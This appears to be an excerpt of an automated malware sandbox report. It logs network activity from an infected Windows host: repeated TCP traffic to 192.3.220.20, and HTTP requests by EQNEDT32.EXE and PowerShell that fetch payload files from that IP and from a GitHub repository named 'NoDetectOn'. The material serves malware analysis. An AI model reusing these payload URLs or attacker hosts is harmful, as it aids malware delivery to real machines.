Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.3.220.20:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 192.3.220.20:80
Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /100/RRFGV.txt HTTP/1.1Host: 192.3.220.20Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
Source: Joe Sandbox ViewIP Address: 192.3.220.20 192.3.220.20
Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global trafficHTTP traffic detected: GET /100/newprojectwithnewthingstobecome.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.20Connection: Keep-Alive
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.22:49164 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CE855C3E-50BE-4A15-8784-7DABB9819277}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /100/newprojectwithnewthingstobecome.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.20Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /100/RRFGV.txt HTTP/1.1Host: 192.3.220.20Connection: Keep-Alive
Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 05 Oct 2024 12:49:50 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Content-Length: 298Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 33 2e 32 32 30 2e 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 192.3.220.20 Port 80</address></body></html>
Source: powershell.exe, 00000008.00000002.380604266.00000000025D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20
Source: powershell.exe, 00000008.00000002.380604266.00000000025D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/100/RRFGV.txt
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.364639582.00000000002AF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.364052358.0000000000319000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.364033598.00000000002FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/100/newprojectwithnewthingstobecome.tIF
Source: EQNEDT32.EXE, 00000002.00000003.364052358.0000000000319000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.364033598.00000000002FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/100/newprojectwithnewthingstobecome.tIFC:
Source: EQNEDT32.EXE, 00000002.00000002.364639582.00000000002A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/100/newprojectwithnewthingstobecome.tIFf
Source: EQNEDT32.EXE, 00000002.00000002.364639582.00000000002AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/100/newprojectwithnewthingstobecome.tIFj
Source: EQNEDT32.EXE, 00000002.00000002.364639582.00000000002A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/100/newprojectwithnewthingstobecome.tIFv
Source: powershell.exe, 00000008.00000002.385304370.0000000005007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000008.00000002.385304370.0000000005007000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000008.00000002.380604266.00000000029F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
Source: powershell.exe, 00000008.00000002.380078753.000000000041A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000008.00000002.382187322.0000000003369000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000008.00000002.385304370.0000000004FDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
